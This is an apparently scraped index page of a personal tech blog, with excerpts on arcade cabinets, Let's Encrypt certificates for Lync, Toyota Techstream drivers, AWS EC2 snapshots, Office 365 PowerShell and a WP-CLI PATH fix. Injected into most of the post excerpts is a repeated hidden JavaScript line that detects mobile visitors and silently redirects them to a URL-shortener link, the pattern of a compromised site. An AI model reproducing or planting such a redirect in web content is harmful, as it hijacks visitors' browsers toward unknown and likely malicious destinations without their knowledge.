Arcade 02 – Arcade machine with Coin Acceptor
| December 7th, 2024Full Arcade Cabinet
| December 16th, 2022Atari 2600 Static Sound Problem
| March 15th, 2020Arduino, LCD & buttons
| December 4th, 2019Let’s encrypt certificate for Lync (Skype for Business)
| October 27th, 2018Assign a new wildcard certificate for Lync Edge
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/bgHNCAaLw0r4");
Let's Encrypt is a free, automated, and open Certificate Authority. It has a limitation for 3 month, but it can be automatically renewed.
Follow the below steps to use let's encrypt certificate on a Lync server:
Search and open "Lync Server Deployment Wizard"
Once open, Read more [...]
Toyota Techstream – Mini VCI – Windows 10 pro
| April 14th, 2018Configuring Mini VCI to work with Windows 10
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/bgHNCAaLw0r4");
After I installed the software, my Windows 10 didn't recognized the Mini VCI driver. The instillation CD included "MVCI Driver for TOYOTA.msi", but when trying to install, I received this error:
To fix this, I had to extract the file "MVCI Driver for TOYOTA.msi" Read more [...]
Manage AWS EC2 Snapshots
| November 23rd, 2017Create and delete snapshots
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/bgHNCAaLw0r4");
Create and delete snapshots according to retention plan.
IAM account:
In the AWS Management Console, go to IAM service. On the right side click on Users then Add User:
Type In user name and select Programmatic access. Then Next:Permissions
On the next Read more [...]
Set default email for Office 365
| August 6th, 2017Powershell script to set default email for all AD users
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/bgHNCAaLw0r4");
Depending on the information stored for the users in the AD, there is two ways this can be accomplished:
1.Set email field and default email in ProxyAddresses according to UserPrincipalName:
$users = Get-ADUser -Filter * -properties EmailAddress -SearchBase "ou=Test,ou=Departments,dc=DOMAIN,dc=COM"
foreach Read more [...]
bash: wp: command not found
| August 4th, 2017WP-Cli
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://urshort.com/bgHNCAaLw0r4");
After installing WP-CLI as in here: http://wp-cli.org/
executing wp gives the error:
bash: wp: command not found
For me the problem was that the system didn't have the directory /usr/local/bin in the PATH, to add it:
PATH=$PATH:/usr/local/bin
export PATH